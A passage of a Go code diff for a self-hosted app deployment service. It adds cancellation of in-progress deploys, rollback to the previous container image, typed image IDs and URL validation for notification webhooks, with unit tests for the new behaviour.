+		require.NoError(t, err)
+
+		// Check the Set-Cookie header to verify MaxAge is -1 (immediate expiry).
+		// With MaxAge = -1, the cookie should have Max-Age=0 in the HTTP header
+		// (per http.Cookie semantics: negative MaxAge means delete now).
+		cookies := recorder.Result().Cookies()
+		require.NotEmpty(t, cookies, "expected a Set-Cookie header")
+
+		found := false
+
+		for _, c := range cookies {
+			if c.MaxAge < 0 {
+				found = true
+
+				break
+			}
+		}
+
+		assert.True(t, found, "expected a cookie with negative MaxAge (deletion)")
+	})
+}

internal/service/deploy/deploy.go

@@ -11,6 +11,7 @@ import (
 	"log/slog"
 	"os"
 	"path/filepath"
+	"strings"
 	"sync"
 	"time"
 
@@ -43,10 +44,14 @@ var (
 	ErrContainerUnhealthy = errors.New("container unhealthy after 60 seconds")
 	// ErrDeploymentInProgress indicates another deployment is already running.
 	ErrDeploymentInProgress = errors.New("deployment already in progress for this app")
+	// ErrDeployCancelled indicates the deployment was cancelled by a newer deploy.
+	ErrDeployCancelled = errors.New("deployment cancelled by newer deploy")
 	// ErrBuildTimeout indicates the build phase exceeded the timeout.
 	ErrBuildTimeout = errors.New("build timeout exceeded")
 	// ErrDeployTimeout indicates the deploy phase exceeded the timeout.
 	ErrDeployTimeout = errors.New("deploy timeout exceeded")
+	// ErrNoPreviousImage indicates there is no previous image to rollback to.
+	ErrNoPreviousImage = errors.New("no previous image available for rollback")
 )
 
 // logFlushInterval is how often to flush buffered logs to the database.
@@ -78,6 +83,7 @@ type deploymentLogWriter struct {
 	lineBuffer bytes.Buffer // buffer for incomplete lines
 	mu         sync.Mutex
 	done       chan struct{}
+	flushed    sync.WaitGroup  // waits for flush goroutine to finish
 	flushCtx   context.Context //nolint:containedctx // needed for async flush goroutine
 }
 
@@ -87,6 +93,8 @@ func newDeploymentLogWriter(ctx context.Context, deployment *models.Deployment)
 		done:       make(chan struct{}),
 		flushCtx:   ctx,
 	}
+	w.flushed.Add(1)
+
 	go w.runFlushLoop()
 
 	return w
@@ -128,12 +136,15 @@ func (w *deploymentLogWriter) Write(p []byte) (int, error) {
 	return len(p), nil
 }
 
-// Close stops the flush loop and performs a final flush.
+// Close stops the flush loop, waits for the final flush to complete.
 func (w *deploymentLogWriter) Close() {
 	close(w.done)
+	w.flushed.Wait()
 }
 
 func (w *deploymentLogWriter) runFlushLoop() {
+	defer w.flushed.Done()
+
 	ticker := time.NewTicker(logFlushInterval)
 	defer ticker.Stop()
 
@@ -199,15 +210,22 @@ type ServiceParams struct {
 	Notify   *notify.Service
 }
 
+// activeDeploy tracks a running deployment so it can be cancelled.
+type activeDeploy struct {
+	cancel context.CancelFunc
+	done   chan struct{}
+}
+
 // Service provides deployment functionality.
 type Service struct {
-	log      *slog.Logger
+	log           *slog.Logger
-	db       *database.Database
+	db            *database.Database
-	docker   *docker.Client
+	docker        *docker.Client
-	notify   *notify.Service
+	notify        *notify.Service
-	config   *config.Config
+	config        *config.Config
-	params   *ServiceParams
+	params        *ServiceParams
-	appLocks sync.Map // map[string]*sync.Mutex - per-app deployment locks
+	activeDeploys sync.Map // map[string]*activeDeploy - per-app active deployment tracking
+	appLocks      sync.Map // map[string]*sync.Mutex - per-app deployment locks
 }
 
 // New creates a new deploy Service.
@@ -233,8 +251,8 @@ func New(lc fx.Lifecycle, params ServiceParams) (*Service, error) {
 }
 
 // GetBuildDir returns the build directory path for an app.
-func (svc *Service) GetBuildDir(appID string) string {
+func (svc *Service) GetBuildDir(appName string) string {
-	return filepath.Join(svc.config.DataDir, "builds", appID)
+	return filepath.Join(svc.config.DataDir, "builds", appName)
 }
 
 // GetLogFilePath returns the path to the log file for a deployment.
@@ -268,12 +286,39 @@ func (svc *Service) GetLogFilePath(app *models.App, deployment *models.Deploymen
 	return filepath.Join(svc.config.DataDir, "logs", hostname, app.Name, filename)
 }
 
-// Deploy deploys an app.
+// HasActiveDeploy returns true if there is an active deployment for the given app.
+func (svc *Service) HasActiveDeploy(appID string) bool {
+	_, ok := svc.activeDeploys.Load(appID)
+
+	return ok
+}
+
+// CancelDeploy cancels any in-progress deployment for the given app
+// and waits for it to finish before returning. Returns true if a deployment
+// was cancelled, false if there was nothing to cancel.
+func (svc *Service) CancelDeploy(appID string) bool {
+	if !svc.HasActiveDeploy(appID) {
+		return false
+	}
+
+	svc.cancelActiveDeploy(appID)
+
+	return true
+}
+
+// Deploy deploys an app. If cancelExisting is true (e.g. webhook-triggered),
+// any in-progress deploy for the same app will be cancelled before starting.
+// If cancelExisting is false and a deploy is in progress, ErrDeploymentInProgress is returned.
 func (svc *Service) Deploy(
 	ctx context.Context,
 	app *models.App,
 	webhookEventID *int64,
+	cancelExisting bool,
 ) error {
+	if cancelExisting {
+		svc.cancelActiveDeploy(app.ID)
+	}
+
 	// Try to acquire per-app deployment lock
 	if !svc.tryLockApp(app.ID) {
 		svc.log.Warn("deployment already in progress", "app", app.Name)
@@ -282,45 +327,184 @@ func (svc *Service) Deploy(
 	}
 	defer svc.unlockApp(app.ID)
 
+	// Set up cancellable context and register as active deploy
+	deployCtx, cancel := context.WithCancel(ctx)
+	done := make(chan struct{})
+	ad := &activeDeploy{cancel: cancel, done: done}
+	svc.activeDeploys.Store(app.ID, ad)
+
+	defer func() {
+		cancel()
+		close(done)
+		svc.activeDeploys.Delete(app.ID)
+	}()
+
 	// Fetch webhook event and create deployment record
-	webhookEvent := svc.fetchWebhookEvent(ctx, webhookEventID)
+	webhookEvent := svc.fetchWebhookEvent(deployCtx, webhookEventID)
 
-	deployment, err := svc.createDeploymentRecord(ctx, app, webhookEventID, webhookEvent)
+	// Use a background context for DB operations that must complete regardless of cancellation
+	bgCtx := context.WithoutCancel(deployCtx)
+
+	deployment, err := svc.createDeploymentRecord(bgCtx, app, webhookEventID, webhookEvent)
 	if err != nil {
 		return err
 	}
 
-	svc.logWebhookPayload(ctx, deployment, webhookEvent)
+	svc.logWebhookPayload(bgCtx, deployment, webhookEvent)
 
-	err = svc.updateAppStatusBuilding(ctx, app)
+	err = svc.updateAppStatusBuilding(bgCtx, app)
 	if err != nil {
 		return err
 	}
 
-	svc.notify.NotifyBuildStart(ctx, app, deployment)
+	svc.notify.NotifyBuildStart(bgCtx, app, deployment)
 
+	return svc.runBuildAndDeploy(deployCtx, bgCtx, app, deployment)
+}
+
+// Rollback rolls back an app to its previous image.
+// It stops the current container, starts a new one with the previous image,
+// and creates a deployment record for the rollback.
+func (svc *Service) Rollback(ctx context.Context, app *models.App) error {
+	if !app.PreviousImageID.Valid || app.PreviousImageID.String == "" {
+		return ErrNoPreviousImage
+	}
+
+	// Acquire per-app deployment lock
+	if !svc.tryLockApp(app.ID) {
+		return ErrDeploymentInProgress
+	}
+	defer svc.unlockApp(app.ID)
+
+	bgCtx := context.WithoutCancel(ctx)
+
+	deployment, err := svc.createRollbackDeployment(bgCtx, app)
+	if err != nil {
+		return err
+	}
+
+	return svc.executeRollback(ctx, bgCtx, app, deployment)
+}
+
+// createRollbackDeployment creates a deployment record for a rollback operation.
+func (svc *Service) createRollbackDeployment(
+	ctx context.Context,
+	app *models.App,
+) (*models.Deployment, error) {
+	deployment := models.NewDeployment(svc.db)
+	deployment.AppID = app.ID
+	deployment.Status = models.DeploymentStatusDeploying
+	deployment.ImageID = sql.NullString{String: app.PreviousImageID.String, Valid: true}
+
+	saveErr := deployment.Save(ctx)
+	if saveErr != nil {
+		return nil, fmt.Errorf("failed to create rollback deployment: %w", saveErr)
+	}
+
+	_ = deployment.AppendLog(ctx, "Rolling back to previous image: "+app.PreviousImageID.String)
+
+	return deployment, nil
+}
+
+// executeRollback performs the container swap for a rollback.
+func (svc *Service) executeRollback(
+	ctx context.Context,
+	bgCtx context.Context,
+	app *models.App,
+	deployment *models.Deployment,
+) error {
+	previousImageID := app.PreviousImageID.String
+
+	svc.removeOldContainer(ctx, app, deployment)
+
+	rollbackOpts, err := svc.buildContainerOptions(ctx, app, docker.ImageID(previousImageID))
+	if err != nil {
+		svc.failDeployment(bgCtx, app, deployment, err)
+
+		return fmt.Errorf("failed to build container options: %w", err)
+	}
+
+	containerID, err := svc.docker.CreateContainer(ctx, rollbackOpts)
+	if err != nil {
+		svc.failDeployment(bgCtx, app, deployment, fmt.Errorf("failed to create rollback container: %w", err))
+
+		return fmt.Errorf("failed to create rollback container: %w", err)
+	}
+
+	deployment.ContainerID = sql.NullString{String: containerID.String(), Valid: true}
+	_ = deployment.AppendLog(bgCtx, "Rollback container created: "+containerID.String())
+
+	startErr := svc.docker.StartContainer(ctx, containerID)
+	if startErr != nil {
+		svc.failDeployment(bgCtx, app, deployment, fmt.Errorf("failed to start rollback container: %w", startErr))
+
+		return fmt.Errorf("failed to start rollback container: %w", startErr)
+	}
+
+	_ = deployment.AppendLog(bgCtx, "Rollback container started")
+
+	currentImageID := app.ImageID
+	app.ImageID = sql.NullString{String: previousImageID, Valid: true}
+	app.PreviousImageID = currentImageID
+	app.Status = models.AppStatusRunning
+
+	saveErr := app.Save(bgCtx)
+	if saveErr != nil {
+		return fmt.Errorf("failed to update app after rollback: %w", saveErr)
+	}
+
+	_ = deployment.MarkFinished(bgCtx, models.DeploymentStatusSuccess)
+	_ = deployment.AppendLog(bgCtx, "Rollback complete")
+
+	svc.log.Info("rollback completed", "app", app.Name, "image", previousImageID)
+
+	return nil
+}
+
+// runBuildAndDeploy executes the build and deploy phases, handling cancellation.
+func (svc *Service) runBuildAndDeploy(
+	deployCtx context.Context,
+	bgCtx context.Context,
+	app *models.App,
+	deployment *models.Deployment,
+) error {
 	// Build phase with timeout
-	imageID, err := svc.buildImageWithTimeout(ctx, app, deployment)
+	imageID, err := svc.buildImageWithTimeout(deployCtx, app, deployment)
 	if err != nil {
+		cancelErr := svc.checkCancelled(deployCtx, bgCtx, app, deployment, "")
+		if cancelErr != nil {
+			return cancelErr
+		}
+
 		return err
 	}
 
-	svc.notify.NotifyBuildSuccess(ctx, app, deployment)
+	svc.notify.NotifyBuildSuccess(bgCtx, app, deployment)
 
 	// Deploy phase with timeout
-	err = svc.deployContainerWithTimeout(ctx, app, deployment, imageID)
+	err = svc.deployContainerWithTimeout(deployCtx, app, deployment, imageID)
 	if err != nil {
+		cancelErr := svc.checkCancelled(deployCtx, bgCtx, app, deployment, imageID)
+		if cancelErr != nil {
+			return cancelErr
+		}
+
 		return err
 	}
 
-	err = svc.updateAppRunning(ctx, app, imageID)
+	// Save current image as previous before updating to new one
+	if app.ImageID.Valid && app.ImageID.String != "" {
+		app.PreviousImageID = app.ImageID
+	}
+
+	err = svc.updateAppRunning(bgCtx, app, imageID)
 	if err != nil {
 		return err
 	}
 
 	// Use context.WithoutCancel to ensure health check completes even if
 	// the parent context is cancelled (e.g., HTTP request ends).
-	go svc.checkHealthAfterDelay(context.WithoutCancel(ctx), app, deployment)
+	go svc.checkHealthAfterDelay(bgCtx, app, deployment)
 
 	return nil
 }
@@ -330,7 +514,7 @@ func (svc *Service) buildImageWithTimeout(
 	ctx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
-) (string, error) {
+) (docker.ImageID, error) {
 	buildCtx, cancel := context.WithTimeout(ctx, buildTimeout)
 	defer cancel()
 
@@ -355,7 +539,7 @@ func (svc *Service) deployContainerWithTimeout(
 	ctx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
-	imageID string,
+	imageID docker.ImageID,
 ) error {
 	deployCtx, cancel := context.WithTimeout(ctx, deployTimeout)
 	defer cancel()
@@ -457,6 +641,96 @@ func (svc *Service) unlockApp(appID string) {
 	svc.getAppLock(appID).Unlock()
 }
 
+// cancelActiveDeploy cancels any in-progress deployment for the given app
+// and waits for it to finish before returning.
+func (svc *Service) cancelActiveDeploy(appID string) {
+	val, ok := svc.activeDeploys.Load(appID)
+	if !ok {
+		return
+	}
+
+	ad, ok := val.(*activeDeploy)
+	if !ok {
+		return
+	}
+
+	svc.log.Info("cancelling in-progress deployment", "app_id", appID)
+	ad.cancel()
+	<-ad.done
+}
+
+// checkCancelled checks if the deploy context was cancelled (by a newer deploy)
+// and if so, marks the deployment as cancelled and cleans up orphan resources.
+// Returns ErrDeployCancelled or nil.
+func (svc *Service) checkCancelled(
+	deployCtx context.Context,
+	bgCtx context.Context,
+	app *models.App,
+	deployment *models.Deployment,
+	imageID docker.ImageID,
+) error {
+	if !errors.Is(deployCtx.Err(), context.Canceled) {
+		return nil
+	}
+
+	svc.log.Info("deployment cancelled", "app", app.Name)
+
+	svc.cleanupCancelledDeploy(bgCtx, app, deployment, imageID)
+
+	_ = deployment.MarkFinished(bgCtx, models.DeploymentStatusCancelled)
+
+	return ErrDeployCancelled
+}
+
+// cleanupCancelledDeploy removes orphan resources left by a cancelled deployment.
+func (svc *Service) cleanupCancelledDeploy(
+	ctx context.Context,
+	app *models.App,
+	deployment *models.Deployment,
+	imageID docker.ImageID,
+) {
+	// Clean up the intermediate Docker image if one was built
+	if imageID != "" {
+		removeErr := svc.docker.RemoveImage(ctx, imageID)
+		if removeErr != nil {
+			svc.log.Error("failed to remove image from cancelled deploy",
+				"error", removeErr, "app", app.Name, "image", imageID)
+			_ = deployment.AppendLog(ctx, "WARNING: failed to clean up image "+imageID.String()+": "+removeErr.Error())
+		} else {
+			svc.log.Info("cleaned up image from cancelled deploy",
+				"app", app.Name, "image", imageID)
+			_ = deployment.AppendLog(ctx, "Cleaned up intermediate image: "+imageID.String())
+		}
+	}
+
+	// Clean up the build directory for this deployment
+	buildDir := svc.GetBuildDir(app.Name)
+
+	entries, err := os.ReadDir(buildDir)
+	if err != nil {
+		return
+	}
+
+	prefix := fmt.Sprintf("%d-", deployment.ID)
+
+	for _, entry := range entries {
+		if entry.IsDir() && strings.HasPrefix(entry.Name(), prefix) {
+			dirPath := filepath.Join(buildDir, entry.Name())
+
+			removeErr := os.RemoveAll(dirPath)
+			if removeErr != nil {
+				svc.log.Error("failed to remove build dir from cancelled deploy",
+					"error", removeErr, "path", dirPath)
+			} else {
+				svc.log.Info("cleaned up build dir from cancelled deploy",
+					"app", app.Name, "path", dirPath)
+
+				_ = deployment.AppendLog(ctx, "Cleaned up build directory")
+			}
+		}
+	}
+}
+
 func (svc *Service) fetchWebhookEvent(
 	ctx context.Context,
 	webhookEventID *int64,
@@ -542,7 +816,7 @@ func (svc *Service) buildImage(
 	ctx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
-) (string, error) {
+) (docker.ImageID, error) {
 	workDir, cleanup, err := svc.cloneRepository(ctx, app, deployment)
 	if err != nil {
 		return "", err
@@ -576,8 +850,8 @@ func (svc *Service) buildImage(
 		return "", fmt.Errorf("failed to build image: %w", err)
 	}
 
-	deployment.ImageID = sql.NullString{String: imageID, Valid: true}
+	deployment.ImageID = sql.NullString{String: imageID.String(), Valid: true}
-	_ = deployment.AppendLog(ctx, "Image built: "+imageID)
+	_ = deployment.AppendLog(ctx, "Image built: "+imageID.String())
 
 	return imageID, nil
 }
@@ -735,16 +1009,16 @@ func (svc *Service) removeOldContainer(
 		svc.log.Warn("failed to remove old container", "error", removeErr)
 	}
 
-	_ = deployment.AppendLog(ctx, "Old container removed: "+containerInfo.ID[:12])
+	_ = deployment.AppendLog(ctx, "Old container removed: "+string(containerInfo.ID[:12]))
 }
 
 func (svc *Service) createAndStartContainer(
 	ctx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
-	_ string,
+	imageID docker.ImageID,
-) (string, error) {
+) (docker.ContainerID, error) {
-	containerOpts, err := svc.buildContainerOptions(ctx, app, deployment.ID)
+	containerOpts, err := svc.buildContainerOptions(ctx, app, imageID)
 	if err != nil {
 		svc.failDeployment(ctx, app, deployment, err)
 
@@ -764,8 +1038,8 @@ func (svc *Service) createAndStartContainer(
 		return "", fmt.Errorf("failed to create container: %w", err)
 	}
 
-	deployment.ContainerID = sql.NullString{String: containerID, Valid: true}
+	deployment.ContainerID = sql.NullString{String: containerID.String(), Valid: true}
-	_ = deployment.AppendLog(ctx, "Container created: "+containerID)
+	_ = deployment.AppendLog(ctx, "Container created: "+containerID.String())
 
 	startErr := svc.docker.StartContainer(ctx, containerID)
 	if startErr != nil {
@@ -788,7 +1062,7 @@ func (svc *Service) createAndStartContainer(
 func (svc *Service) buildContainerOptions(
 	ctx context.Context,
 	app *models.App,
-	deploymentID int64,
+	imageID docker.ImageID,
 ) (docker.CreateContainerOptions, error) {
 	envVars, err := app.GetEnvVars(ctx)
 	if err != nil {
@@ -822,7 +1096,7 @@ func (svc *Service) buildContainerOptions(
 
 	return docker.CreateContainerOptions{
 		Name:    "upaas-" + app.Name,
-		Image:   fmt.Sprintf("upaas-%s:%d", app.Name, deploymentID),
+		Image:   imageID.String(),
 		Env:     envMap,
 		Labels:  buildLabelMap(app, labels),
 		Volumes: buildVolumeMounts(volumes),
@@ -872,9 +1146,9 @@ func buildPortMappings(ports []*models.Port) []docker.PortMapping {
 func (svc *Service) updateAppRunning(
 	ctx context.Context,
 	app *models.App,
-	imageID string,
+	imageID docker.ImageID,
 ) error {
-	app.ImageID = sql.NullString{String: imageID, Valid: true}
+	app.ImageID = sql.NullString{String: imageID.String(), Valid: true}
 	app.Status = models.AppStatusRunning
 
 	saveErr := app.Save(ctx)

internal/service/deploy/deploy_cancel_test.go

@@ -0,0 +1,133 @@
+package deploy_test
+
+import (
+	"context"
+	"log/slog"
+	"sync"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+
+	"git.eeqj.de/sneak/upaas/internal/service/deploy"
+)
+
+func TestCancelActiveDeploy_NoExisting(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	// Should not panic or block when no active deploy exists
+	svc.CancelActiveDeploy("nonexistent-app")
+}
+
+func TestCancelActiveDeploy_CancelsAndWaits(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	ctx, cancel := context.WithCancel(context.Background())
+	done := make(chan struct{})
+
+	svc.RegisterActiveDeploy("app-1", cancel, done)
+
+	// Simulate a running deploy that respects cancellation
+	var deployFinished bool
+
+	go func() {
+		<-ctx.Done()
+
+		deployFinished = true
+
+		close(done)
+	}()
+
+	svc.CancelActiveDeploy("app-1")
+	assert.True(t, deployFinished, "deploy should have finished after cancellation")
+}
+
+func TestCancelActiveDeploy_BlocksUntilDone(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	ctx, cancel := context.WithCancel(context.Background())
+	done := make(chan struct{})
+
+	svc.RegisterActiveDeploy("app-2", cancel, done)
+
+	// Simulate slow cleanup after cancellation
+	go func() {
+		<-ctx.Done()
+		time.Sleep(50 * time.Millisecond)
+		close(done)
+	}()
+
+	start := time.Now()
+
+	svc.CancelActiveDeploy("app-2")
+
+	elapsed := time.Since(start)
+
+	assert.GreaterOrEqual(t, elapsed, 50*time.Millisecond,
+		"cancelActiveDeploy should block until the deploy finishes")
+}
+
+func TestTryLockApp_PreventsConcurrent(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	assert.True(t, svc.TryLockApp("app-1"), "first lock should succeed")
+	assert.False(t, svc.TryLockApp("app-1"), "second lock should fail")
+
+	svc.UnlockApp("app-1")
+
+	assert.True(t, svc.TryLockApp("app-1"), "lock after unlock should succeed")
+
+	svc.UnlockApp("app-1")
+}
+
+func TestCancelActiveDeploy_AllowsNewDeploy(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	// Simulate an active deploy holding the lock
+	ctx, cancel := context.WithCancel(context.Background())
+	done := make(chan struct{})
+
+	svc.RegisterActiveDeploy("app-3", cancel, done)
+
+	// Lock the app as if a deploy is in progress
+	assert.True(t, svc.TryLockApp("app-3"))
+
+	// Simulate deploy goroutine: release lock on cancellation
+	var mu sync.Mutex
+
+	released := false
+
+	go func() {
+		<-ctx.Done()
+
+		svc.UnlockApp("app-3")
+
+		mu.Lock()
+		released = true
+		mu.Unlock()
+
+		close(done)
+	}()
+
+	// Cancel should cause the old deploy to release its lock
+	svc.CancelActiveDeploy("app-3")
+
+	mu.Lock()
+	assert.True(t, released)
+	mu.Unlock()
+
+	// Now a new deploy should be able to acquire the lock
+	assert.True(t, svc.TryLockApp("app-3"), "should be able to lock after cancellation")
+
+	svc.UnlockApp("app-3")
+}

internal/service/deploy/deploy_cleanup_test.go

@@ -0,0 +1,63 @@
+package deploy_test
+
+import (
+	"context"
+	"log/slog"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	"git.eeqj.de/sneak/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/service/deploy"
+)
+
+func TestCleanupCancelledDeploy_RemovesBuildDir(t *testing.T) {
+	t.Parallel()
+
+	tmpDir := t.TempDir()
+	cfg := &config.Config{DataDir: tmpDir}
+
+	svc := deploy.NewTestServiceWithConfig(slog.Default(), cfg, nil)
+
+	// Create a fake build directory matching the deployment pattern
+	appName := "test-app"
+	buildDir := svc.GetBuildDirExported(appName)
+	require.NoError(t, os.MkdirAll(buildDir, 0o750))
+
+	// Create deployment-specific dir: <deploymentID>-<random>
+	deployDir := filepath.Join(buildDir, "42-abc123")
+	require.NoError(t, os.MkdirAll(deployDir, 0o750))
+
+	// Create a file inside to verify full removal
+	require.NoError(t, os.WriteFile(filepath.Join(deployDir, "work"), []byte("test"), 0o600))
+
+	// Also create a dir for a different deployment (should NOT be removed)
+	otherDir := filepath.Join(buildDir, "99-xyz789")
+	require.NoError(t, os.MkdirAll(otherDir, 0o750))
+
+	// Run cleanup for deployment 42
+	svc.CleanupCancelledDeploy(context.Background(), appName, 42, "")
+
+	// Deployment 42's dir should be gone
+	_, err := os.Stat(deployDir)
+	assert.True(t, os.IsNotExist(err), "deployment build dir should be removed")
+
+	// Deployment 99's dir should still exist
+	_, err = os.Stat(otherDir)
+	assert.NoError(t, err, "other deployment build dir should not be removed")
+}
+
+func TestCleanupCancelledDeploy_NoBuildDir(t *testing.T) {
+	t.Parallel()
+
+	tmpDir := t.TempDir()
+	cfg := &config.Config{DataDir: tmpDir}
+
+	svc := deploy.NewTestServiceWithConfig(slog.Default(), cfg, nil)
+
+	// Should not panic when build dir doesn't exist
+	svc.CleanupCancelledDeploy(context.Background(), "nonexistent-app", 1, "")
+}

internal/service/deploy/deploy_container_test.go

@@ -0,0 +1,45 @@
+package deploy_test
+
+import (
+	"context"
+	"log/slog"
+	"os"
+	"testing"
+
+	"git.eeqj.de/sneak/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/docker"
+	"git.eeqj.de/sneak/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/service/deploy"
+)
+
+func TestBuildContainerOptionsUsesImageID(t *testing.T) {
+	t.Parallel()
+
+	db := database.NewTestDatabase(t)
+
+	app := models.NewApp(db)
+	app.Name = "myapp"
+
+	err := app.Save(context.Background())
+	if err != nil {
+		t.Fatalf("failed to save app: %v", err)
+	}
+
+	log := slog.New(slog.NewTextHandler(os.Stderr, nil))
+	svc := deploy.NewTestService(log)
+
+	const expectedImageID = docker.ImageID("sha256:abc123def456")
+
+	opts, err := svc.BuildContainerOptionsExported(context.Background(), app, expectedImageID)
+	if err != nil {
+		t.Fatalf("buildContainerOptions returned error: %v", err)
+	}
+
+	if opts.Image != expectedImageID.String() {
+		t.Errorf("expected Image=%q, got %q", expectedImageID, opts.Image)
+	}
+
+	if opts.Name != "upaas-myapp" {
+		t.Errorf("expected Name=%q, got %q", "upaas-myapp", opts.Name)
+	}
+}

internal/service/deploy/export_test.go

@@ -0,0 +1,92 @@
+package deploy
+
+import (
+	"context"
+	"fmt"
+	"log/slog"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"git.eeqj.de/sneak/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/docker"
+	"git.eeqj.de/sneak/upaas/internal/models"
+)
+
+// NewTestService creates a Service with minimal dependencies for testing.
+func NewTestService(log *slog.Logger) *Service {
+	return &Service{
+		log: log,
+	}
+}
+
+// CancelActiveDeploy exposes cancelActiveDeploy for testing.
+func (svc *Service) CancelActiveDeploy(appID string) {
+	svc.cancelActiveDeploy(appID)
+}
+
+// RegisterActiveDeploy registers an active deploy for testing.
+func (svc *Service) RegisterActiveDeploy(appID string, cancel context.CancelFunc, done chan struct{}) {
+	svc.activeDeploys.Store(appID, &activeDeploy{cancel: cancel, done: done})
+}
+
+// TryLockApp exposes tryLockApp for testing.
+func (svc *Service) TryLockApp(appID string) bool {
+	return svc.tryLockApp(appID)
+}
+
+// UnlockApp exposes unlockApp for testing.
+func (svc *Service) UnlockApp(appID string) {
+	svc.unlockApp(appID)
+}
+
+// NewTestServiceWithConfig creates a Service with config and docker client for testing.
+func NewTestServiceWithConfig(log *slog.Logger, cfg *config.Config, dockerClient *docker.Client) *Service {
+	return &Service{
+		log:    log,
+		config: cfg,
+		docker: dockerClient,
+	}
+}
+
+// CleanupCancelledDeploy exposes the build directory cleanup portion of
+// cleanupCancelledDeploy for testing. It removes build directories matching
+// the deployment ID prefix.
+func (svc *Service) CleanupCancelledDeploy(
+	_ context.Context,
+	appName string,
+	deploymentID int64,
+	_ string,
+) {
+	// We can't create real models.App/Deployment in tests easily,
+	// so we test the build dir cleanup portion directly.
+	buildDir := svc.GetBuildDir(appName)
+
+	entries, err := os.ReadDir(buildDir)
+	if err != nil {
+		return
+	}
+
+	prefix := fmt.Sprintf("%d-", deploymentID)
+
+	for _, entry := range entries {
+		if entry.IsDir() && strings.HasPrefix(entry.Name(), prefix) {
+			dirPath := filepath.Join(buildDir, entry.Name())
+			_ = os.RemoveAll(dirPath)
+		}
+	}
+}
+
+// GetBuildDirExported exposes GetBuildDir for testing.
+func (svc *Service) GetBuildDirExported(appName string) string {
+	return svc.GetBuildDir(appName)
+}
+
+// BuildContainerOptionsExported exposes buildContainerOptions for testing.
+func (svc *Service) BuildContainerOptionsExported(
+	ctx context.Context,
+	app *models.App,
+	imageID docker.ImageID,
+) (docker.CreateContainerOptions, error) {
+	return svc.buildContainerOptions(ctx, app, imageID)
+}

internal/service/notify/notify.go

@@ -10,6 +10,7 @@ import (
 	"fmt"
 	"log/slog"
 	"net/http"
+	"net/url"
 	"time"
 
 	"go.uber.org/fx"
@@ -247,10 +248,15 @@ func (svc *Service) sendNtfy(
 ) error {
 	svc.log.Debug("sending ntfy notification", "topic", topic, "title", title)
 
+	parsedURL, err := url.ParseRequestURI(topic)
+	if err != nil {
+		return fmt.Errorf("invalid ntfy topic URL: %w", err)
+	}
+
 	request, err := http.NewRequestWithContext(
 		ctx,
 		http.MethodPost,
-		topic,
+		parsedURL.String(),
 		bytes.NewBufferString(message),
 	)
 	if err != nil {
@@ -260,7 +266,7 @@ func (svc *Service) sendNtfy(
 	request.Header.Set("Title", title)
 	request.Header.Set("Priority", svc.ntfyPriority(priority))
 
-	resp, err := svc.client.Do(request)
+	resp, err := svc.client.Do(request) // #nosec G704 -- URL from validated config, not user input
 	if err != nil {
 		return fmt.Errorf("failed to send ntfy request: %w", err)
 	}
@@ -340,10 +346,15 @@ func (svc *Service) sendSlack(
 		return fmt.Errorf("failed to marshal slack payload: %w", err)
 	}
 
+	parsedWebhookURL, err := url.ParseRequestURI(webhookURL)
+	if err != nil {
+		return fmt.Errorf("invalid slack webhook URL: %w", err)
+	}
+
 	request, err := http.NewRequestWithContext(
 		ctx,
 		http.MethodPost,
-		webhookURL,
+		parsedWebhookURL.String(),
 		bytes.NewBuffer(body),
 	)
 	if err != nil {
@@ -352,7 +363,7 @@ func (svc *Service) sendSlack(
 
 	request.Header.Set("Content-Type", "application/json")
 
-	resp, err := svc.client.Do(request)
+	resp, err := svc.client.Do(request) // #nosec G704 -- URL from validated config, not user input
 	if err != nil {
 		return fmt.Errorf("failed to send slack request: %w", err)
 	}

internal/service/webhook/types.go

@@ -0,0 +1,10 @@
+package webhook
+
+// UnparsedURL is a URL stored as a plain string without parsing.
+// Use this instead of string when the value is known to be a URL
+// but should not be parsed into a net/url.URL (e.g. webhook URLs,
+// compare URLs from external payloads).
+type UnparsedURL string
+
+// String implements the fmt.Stringer interface.
+func (u UnparsedURL) String() string { return string(u) }

internal/service/webhook/webhook.go

@@ -11,6 +11,7 @@ import (
 	"go.uber.org/fx"
 
 	"git.eeqj.de/sneak/upaas/internal/database"
+
 	"git.eeqj.de/sneak/upaas/internal/logger"
 	"git.eeqj.de/sneak/upaas/internal/models"
 	"git.eeqj.de/sneak/upaas/internal/service/deploy"
@@ -47,24 +48,24 @@ func New(_ fx.Lifecycle, params ServiceParams) (*Service, error) {
 //
 //nolint:tagliatelle // Field names match Gitea API (snake_case)
 type GiteaPushPayload struct {
-	Ref        string `json:"ref"`
+	Ref        string      `json:"ref"`
-	Before     string `json:"before"`
+	Before     string      `json:"before"`
-	After      string `json:"after"`
+	After      string      `json:"after"`
-	CompareURL string `json:"compare_url"`
+	CompareURL UnparsedURL `json:"compare_url"`
 	Repository struct {
-		FullName string `json:"full_name"`
+		FullName string      `json:"full_name"`
-		CloneURL string `json:"clone_url"`
+		CloneURL UnparsedURL `json:"clone_url"`
-		SSHURL   string `json:"ssh_url"`
+		SSHURL   string      `json:"ssh_url"`
-		HTMLURL  string `json:"html_url"`
+		HTMLURL  UnparsedURL `json:"html_url"`
 	} `json:"repository"`
 	Pusher struct {
 		Username string `json:"username"`
 		Email    string `json:"email"`
 	} `json:"pusher"`
 	Commits []struct {
-		ID      string `json:"id"`
+		ID      string      `json:"id"`
-		URL     string `json:"url"`
+		URL     UnparsedURL `json:"url"`
-		Message string `json:"message"`
+		Message string      `json:"message"`
 		Author  struct {
 			Name  string `json:"name"`
 			Email string `json:"email"`
@@ -104,7 +105,7 @@ func (svc *Service) HandleWebhook(
